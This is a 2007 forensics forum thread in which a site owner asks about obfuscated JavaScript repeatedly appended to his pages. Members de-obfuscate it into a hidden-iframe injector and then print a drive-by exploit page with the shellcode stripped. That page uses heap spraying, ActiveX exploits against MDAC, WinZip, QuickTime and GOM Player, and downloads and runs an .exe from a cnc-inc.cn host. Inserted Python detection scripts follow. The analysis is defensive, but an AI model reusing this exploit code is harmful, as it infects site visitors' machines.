Security Forums
What Does This Hack Do? (a new one)

Forum: Computer Forensics and Incident Response
mrconsumer (Just Arrived; joined 24 Jul 2007)
Posted: Tue Nov 13, 2007 1:24 pm    Post subject: What Does This Hack Do? (a new one)

I am so exasperated! I have three different websites with two different hosts, and each, on average, once a month, has all .htm and .php files in the root directory changed.

All that is done is a line, like the one below, is added as the last line of the file.

I have changed my passwords multiple times, to no avail. I have scanned my home computer repeatedly for rootkits, viruses, spyware, etc., and remove any/all found.

Two questions:

(1) any idea how to stop this?
(2) what does this particular one do? (the line is copied below).

Thanks,
Ed

Moderator note: removed large malicious code snippet to avoid AV hits - capi
jumperinthedoor (Just Arrived; joined 30 Oct 2007)
Posted: Tue Nov 13, 2007 7:46 pm

It is obfuscated javascript. Here it is de-obfuscated:

Code:
<script>
function IFrame(){}
IFrame.prototype = {

   host : 'drivers.aero4.cn',
   path : '/x86/',
   cookieName : 'vda4r',
   cookieValue : 1,

   setCookie : function(name, value)
   {
      var d= new Date(); d.setTime(new Date().getTime() + 86400000);
      document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();          
   },
   install : function()
   {
      if(!this.alreadyInstalled())
      {
         var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
         try { document.write(s) }
         catch(e){ document.write("<html><body>" + s + "</body></html>") }
         this.setCookie(this.cookieName, this.cookieValue);   
      }
   },
   getFrameURL : function()
   {
      var dlh=document.location.host;
      return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
   },
   alreadyInstalled : function()
   {
      return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
   },
   getRandString : function()
   {
      var l=16, c= '0123456789abcdef', o='';
      for (var i=0; i < l; i++)         
         o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);
               
      return o;
   }   
}
var o = new IFrame();
o.install();
</script>



It drops a cookie if one is not already present. If the cookie is present, it does nothing. If it isn't, it writes an iframe to a unique number/letter combo pre-pended to drivers.aero4.cn/x86/. Something like: hxxp:\\c2pod47eross9r32.80f4r02113f6re45.drivers.aero4.cn/x86/

Moderator note: added [code] tags - capi
mrconsumer (Just Arrived; joined 24 Jul 2007)
Posted: Tue Nov 13, 2007 8:07 pm

Thanks.

Do you have the sense it is dangerous ultimately?

How do I stop this crap from being appended to my files on my server?

Edg
jumperinthedoor (Just Arrived; joined 30 Oct 2007)
Posted: Tue Nov 13, 2007 8:35 pm

This is dangerous to anyone who visits your websites. It probably drops malware on their machines if they are vulnerable to whatever exploits are hosted on the iframe server.

Maybe your host was compromised. Does the host use something like c-panel? If you have made sure you don't have a keystroke logger on your home computer and changed your passwords on your hosts the next thing I would do is make sure you don't have any vulnerable server software. Check your php version. Check for sql injection problems too. Then contact your hosting provider or examine other sites on the host to see if they have the same javascript in them.

Also, an update on your javascript: whatever.whatever.drivers.aero4.cn/x86/ redirects (302) to whatever.cnc-inc.cn/r7e/1/. The .cnc-inc.cn/r7e/1/ does some checking to make sure wget isn't being used. I forged the user-agent and downloaded some additional obfuscated javascript that is a little more tricky to take apart. Working on it now.
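Two things a site owner in mrconsumer's position can do with what jumperinthedoor has established so far are (a) keep a hash baseline of the web root and flag files whose last line has grown a script or iframe, which is exactly the change pattern described in the opening post, and (b) hunt proxy or DNS logs for the generated host shape `<visited-host>.<16 hex chars>.drivers.aero4.cn` that the de-obfuscated `getFrameURL` builds. The script below is an added example written for this thread; it is not code from the thread, from jumperinthedoor's analysis, or from any product. The `demo()` web root and the injected line it appends are constructed, and the regexes for the appended tail are my own heuristics.

```python
import hashlib
import os
import re
import tempfile

# Host shape produced by the de-obfuscated iframe script quoted in this thread:
# http://<visited-host>.<16 hex chars>.drivers.aero4.cn/x86/
# (the hex alphabet comes from its getRandString). Indicator regex is an assumption
# derived from that code, not a published signature.
IFRAME_HOST_RE = re.compile(r"(?:^|\.)[0-9a-f]{16}\.drivers\.aero4\.cn$")

# A script/iframe appended after the document already ended, or an obfuscated
# script/iframe sitting alone on the file's last line (the poster's description).
AFTER_END_RE = re.compile(r"</html>\s*(<(?:script|iframe)\b[\s\S]+)$", re.IGNORECASE)
TAG_START_RE = re.compile(r"<(?:script|iframe)\b", re.IGNORECASE)
OBFUSCATION_RE = re.compile(
    r"\b(?:eval|unescape|document\.write|fromCharCode)\b|<iframe", re.IGNORECASE
)


def is_iframe_host(host):
    """True if a hostname from a proxy/DNS log matches the generated iframe host shape."""
    return IFRAME_HOST_RE.search(host.strip().lower()) is not None


def suspicious_tail(text):
    """Return the suspect trailing markup if a script/iframe looks appended, else None."""
    m = AFTER_END_RE.search(text)
    if m:
        return m.group(1).strip()
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if lines and TAG_START_RE.match(lines[-1]) and OBFUSCATION_RE.search(lines[-1]):
        return lines[-1]
    return None


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, exts=(".htm", ".html", ".php")):
    """Map relative path -> SHA-256 for every web file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                p = os.path.join(dirpath, name)
                baseline[os.path.relpath(p, root)] = sha256_file(p)
    return baseline


def scan(root, baseline):
    """Return {relpath: reason} for files changed since the baseline or carrying an injected tail."""
    findings = {}
    current = build_baseline(root)
    for rel, digest in current.items():
        reasons = []
        if baseline.get(rel) != digest:
            reasons.append("new" if rel not in baseline else "changed")
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as f:
            tail = suspicious_tail(f.read())
        if tail:
            reasons.append("injected tail: " + tail[:60])
        if reasons:
            findings[rel] = "; ".join(reasons)
    for rel in baseline:
        if rel not in current:
            findings[rel] = "missing"
    return findings


def demo():
    """Constructed web root: a clean page and a PHP file, then a script appended to the page."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.htm"), "w", encoding="utf-8") as f:
        f.write("<html><body><p>hello</p></body></html>\n")
    with open(os.path.join(root, "about.php"), "w", encoding="utf-8") as f:
        f.write("<?php echo 'hi'; ?>\n")
    baseline = build_baseline(root)
    # Simulate the injection the thread describes; the payload here just spells "injected".
    with open(os.path.join(root, "index.htm"), "a", encoding="utf-8") as f:
        f.write('<script>eval(unescape("%69%6e%6a%65%63%74%65%64"))</script>\n')
    return scan(root, baseline)


if __name__ == "__main__":
    for path, reason in demo().items():
        print(path, "->", reason)
```

Run `build_baseline` once from a known-clean backup and store the result off the server (the attacker is clearly able to write to the web root, so a baseline kept there can be tampered with); then run `scan` from cron and alert on anything returned. The tail check is a heuristic: a page that legitimately places a `<script>` after `</html>` will be flagged, which is cheap to triage against the hash diff.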
mrconsumer (Just Arrived; joined 24 Jul 2007)
Posted: Tue Nov 13, 2007 8:44 pm

Jump,

You are most kind to look into this for me.

My host does use a version of C-panel that I believe they have customized. What should I ask them to look for there in terms of a vulnerability?

As to the other stuff... yes, I have changed passwords, again and again. I do not have access to other sites on my server, as it is shared.

I also do not have the sophistication to examine scripts. For one of my sites, there is NO php at all... yet it gets hit. (Only php and htm/html files in the root directory get hacked.)

Ed
jumperinthedoor (Just Arrived; joined 30 Oct 2007)
Posted: Tue Nov 13, 2007 9:33 pm

I think you should probably contact the host provider and ask them for help. Without access to your server logs it would be difficult to determine how this happened.
mrconsumer (Just Arrived; joined 24 Jul 2007)
Posted: Tue Nov 13, 2007 9:39 pm

Thanks. I have put in a ticket (but if history is any guide, no help will be forthcoming from them).

Ed
jumperinthedoor (Just Arrived; joined 30 Oct 2007)
Posted: Wed Nov 14, 2007 1:29 am

Update: The first javascript wrote an iframe to a site that hosted the javascript below which was also obfuscated. It attempts to exploit several vulnerabilities in software including Microsoft RDS, IE Webview folder icon, Winzip, Quicktime, Yahoo! Instant messenger and the GOM Player Activex control. The shellcode was removed to avoid triggering AV scanners on this post.

Quote:
var memory = new Array(), mem_flag = 0;
function having(){ memory = memory;
setTimeout ("having()" ,1800); }
function getSpraySlide (spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
spraySlide += spraySlide;

spraySlide = spraySlide.substring( 0,spraySlideSize / 2 );
return spraySlide;
}


function MDAC() {
var t = new Array(
"{BD96C556-65A3-11D0-983A-00C04FC29E30}",
"{BD96C556-65A3-11D0-983A-00C04FC29E36}",
"{AB9BCEDD-EC7E-47E1-9322-D4A210617116}",
"{0006F033-0000-0000-C000-000000000046}",
"{0006F03A-0000-0000-C000-000000000046}",
"{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}",
"{6414512B-B978-451D-A0D8-FCFDF33E833C}",
"{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}",
"{06723E09-F4C2-43c8-8358-09FCD1DB0766}",
"{639F725F-1B2D-4831-A9FD-874847682010}",
"{BA018599-1DB3-44f9-83B4-461454C84BF8}",
"{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}",
"{E8CCCDDF-CA28-496b-B050-6C07C962476B}", null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'hxxp:</></>96c09a6f722cf2ecfc690326e0b1c76d.cnc-inc.cn/r7e/1//file.php';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;
try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
}
catch(e)
{ a = null; }

if (a) {
if (! v[0]) {

v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0])
v[0] = CreateObject(a, "Microsoft.XMLHTTP");

if (! v[0])
v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}

if (! v[1])
v[1] = CreateObject(a, "ADODB.Stream");

if (! v[2])
{
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2])
{
v[2] = CreateObject(a, "Shell.Application");
if (v[2])
n=1;
}
}
}
i++;
}
if (v[0] && v[1] && v[2])
{
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "" + "c:"+"\\ms" + "nt" + GetRandString(4) + ".ex" + "e";
if (ADOBDStreamSave(v[1], name, data) == 1)
{
if (ShellExecute(v[2], name, n) == 1)
ret=1;
}
}
}
return ret;
}


function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var heapBlockSize = 0x400000;

var payLoadCode = unescape("REMOVED-BY-ANALYST");
var payLoadSize = payLoadCode.length * 2;

var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++)
memory[i] = spraySlide + payLoadCode;
mem_flag = 1;

having();
return memory;
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231)
xh+='A';

xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function fds907f(o) {
var a=0x7ffffffe, b=0x0c0c0c0c;//, c=0x0c0c0c0c, d=0x0c0c0c0c;
o.setSlice(a,b,b,b);
}

function startWVF()
{
for (i=0;i<128;i++) {
try{ var o = new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1"); fds907f(o);}
catch(e){ }
}
}

function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject("QuickTime.QuickTime");
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="mdqt.php">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }

if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);

} else if (num == 1) {
try {
var winzip = document.createElement("object"); winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");

var ret=winzip.CreateNewFolderFromName(unescape("%00"));
if (ret == false)
{
if (! mem_flag)
makeSlide();

startWinZip(winzip);
num = 255;
}
} catch(e) { }

if (num = 255)
setTimeout("startOverflow(2)", 2000);

else startOverflow(2);

} else if (num ==2)
{
try {
var tar = new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
if (tar)
{
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e){ }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}


function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}
function start() { if (!MDAC()) startOverflow(0); }
</script>

</head><body onload="start()"><div id="mydiv"></div>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='yh8'></object><script language="javascript"> try {

yh8.GetFile("hxxp:</></>96c09a6f722cf2ecfc690326e0b1c76d.cnc-inc.cn/r7e/1//file.php?q=yh8","c:\\msvs7.exe",5,1,"msvs7"); } catch(e){

}</script>
<object classid='clsid:DC07C721-79E0-4BD4-A89F-C90871946A31' id='GomManager' /></object>
<script language='javascript'>
try {
var shellcode = unescape("REMOVED-BY-ANALYST");
var eip = unescape("REMOVED-BY-ANALYST");
var nop = '',i=0;
for(i=0; i < 48; i++) nop += unescape("%90");
var sURL = ''; for(i=0; i < 506; i++) sURL += 'A';
sURL += eip + nop + shellcode;
GomManager.OpenURL(sURL);
} catch(e) {}
</script>
</body></html>


Moderator note: added [code] tags - capi
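The second-stage page jumperinthedoor quotes has a recognisable shape even with the shellcode stripped: a heap spray built by string doubling toward `0x0c0c0c0c`, a loop probing a list of CLSIDs through `ActiveXObject`/`createElement("object")`, and a download-and-run chain through `XMLHTTP`, `ADODB.Stream.SaveToFile` and `WScript.Shell`/`Shell.Application`. The scorer below is an added example for this thread, not code from the thread or from jumperinthedoor; it turns those traits into weighted indicators with a co-occurrence bonus so that a proxy, mail gateway or forensic triage script can rank captured JavaScript. Indicator names, weights and the threshold are my own choices, and both sample scripts are constructed fragments (the "suspect" one mirrors the structure above with no working payload).

```python
import re

# (name, pattern, weight). Patterns follow the structure of the exploit page quoted in this
# thread; the weights are this example's own choice, not a published signature set.
INDICATORS = [
    ("heap_spray_addr", re.compile(r"0x0c0c0c0c|%u0c0c%u0c0c", re.I), 3),
    ("spray_doubling", re.compile(r"(\w+)\s*\+=\s*\1\b"), 2),           # s += s
    ("unescape_payload", re.compile(r"unescape\s*\(\s*[\"'](?:%u[0-9a-f]{4}){4,}", re.I), 3),
    ("activex_probe", re.compile(r"new\s+ActiveXObject\s*\(", re.I), 1),
    ("clsid_list", re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I), 1),
    ("adodb_stream", re.compile(r"ADODB\.Stream", re.I), 2),
    ("shell_object", re.compile(r"WScript\.Shell|Shell\.Application", re.I), 2),
    ("xmlhttp", re.compile(r"XMLHTTP", re.I), 1),
    ("save_to_file", re.compile(r"\.SaveToFile\s*\(", re.I), 2),
    ("exe_concat", re.compile(r"\"\.ex\"\s*\+\s*\"e\"|\.exe[\"']", re.I), 1),   # ".ex" + "e"
]

SPRAY = ("heap_spray_addr", "spray_doubling", "unescape_payload")
EXEC_CHAIN = ("adodb_stream", "shell_object", "save_to_file")


def score_script(js):
    """Return (score, {indicator: hit count}) for a blob of JavaScript."""
    hits = {name: len(rx.findall(js)) for name, rx, _ in INDICATORS}
    hits = {k: v for k, v in hits.items() if v}
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A spray primitive next to ActiveX or a drop-and-run chain is the exploit-kit shape above;
    # either half alone (a game using ActiveX, or a big unescape in a font loader) is not.
    if any(n in hits for n in SPRAY) and (any(n in hits for n in EXEC_CHAIN) or "activex_probe" in hits):
        score += 5
    # Probing many different CLSIDs in one page is itself unusual for legitimate content.
    if hits.get("clsid_list", 0) >= 5:
        score += 2
    return score, hits


def verdict(js, threshold=8):
    """Classify a script; returns (label, score, sorted indicator names)."""
    score, hits = score_script(js)
    label = "exploit-kit-like" if score >= threshold else "benign-looking"
    return label, score, sorted(hits)


# Constructed sample mirroring the quoted page's structure; nothing here runs or drops anything.
SUSPECT = r'''
var memory = new Array();
function getSpraySlide(s, n) { while (s.length*2 < n) s += s; return s; }
var slide = unescape("%u0c0c%u0c0c");
var target = 0x0c0c0c0c;
try { var qt = new ActiveXObject("QuickTime.QuickTime"); } catch(e) {}
var a = document.createElement("object");
a.setAttribute("classid", "clsid:" + "{BD96C556-65A3-11D0-983A-00C04FC29E30}".substring(1, 37));
var st = CreateObject(a, "ADODB.Stream"); var sh = CreateObject(a, "WScript.Shell");
var name = "c:\\ms" + "nt" + ".ex" + "e";
st.SaveToFile(name, 2);
'''

# Constructed benign sample: ordinary page code that also uses unescape and +=.
BENIGN = r'''
function debounce(fn, ms) { var t; return function () { clearTimeout(t); t = setTimeout(fn, ms); }; }
var total = 0; for (var i = 0; i < 10; i++) { total += i; }
document.getElementById("status").textContent = unescape("%48%69");
'''

if __name__ == "__main__":
    for tag, js in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(tag, verdict(js))
```

The value of scoring rather than single-pattern matching is that each indicator on its own has legitimate uses; what should page a responder is the combination, which is why the spray-plus-execution bonus carries more weight than any one pattern. Feed it the de-obfuscated text (as jumperinthedoor did by hand), since the first stage is packed and will score low until unpacked.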
capi (SF Senior Mod; joined 21 Sep 2003; Location: Portugal)
Posted: Sat Nov 24, 2007 5:06 am

janvaljan, a new member of ours, had posted a reply to this thread in Spanish, translating the original post by mrconsumer to Spanish and adding some information and questions of his own.

SFDC is, by its very nature, an international community, and we are always looking forward to having members from all parts of the world join our community. However, being as though we are an international community with members from all over the world, we must maintain communication in a single language that, for better or worse, most people can more or less understand. It would make communication harder if we were to use several different languages amongst ourselves, and it would make the staff's job of moderating content very difficult.

To preserve what janvaljan said in his post, I have made an English translation, which I am including here.


-----BEGIN ENGLISH TRANSLATION-----

Hello, I am Peruvian, my name is jan sanchez, and I also have the same problem.
That is a translation of the problem that this forum starts with (if anyone can translate it better, you're welcome!!! Because my strength is not English)

Well I'll give you some data to see if anyone will help us
This script when it's injected on any website what it does is call two links
You'll see it when you go to an infected website you'll see how it links to two strange auto-generated addresses

It would be nice for you to install Internet Explorer 7 so that when you enter an infected website you get a warning first, asking whether you want to show the content; just choose no and you'll solve that problem, so have no fear.
I hope someone knows what's going on. The weirdest part is that this problem doesn't just present itself on a single hosting but is scattered all around the world.

I would like to know if anyone could explain to me in which way this code injects itself without having access to the hosting?
it's something we don't understand
because when you check the FTP program you can't see anything modified
it doesn't register it but you look at the source code and there's the script

thank you in advance
The links I didn't copy them but they say something like this
One of the links has this "drivers.aero4.cn"
And the other is a bunch of letters and numbers seemingly auto-generated that start like this
http://h5gsdywhjasdjhasjdahsjd

something like that

good luck

and I hope you can help us with this?
and what is it???
jANVALJAN

-----END ENGLISH TRANSLATION-----
OddOne (Trusted SF Member; joined 24 May 2004)
Posted: Wed Dec 12, 2007 11:09 pm

Just visiting this thread is tripping antivirus warnings for JS/Downloader.Agent in my browser cache (Firefox)...

Might wanna remove or "damage" the text so it doesn't cause issues.

oO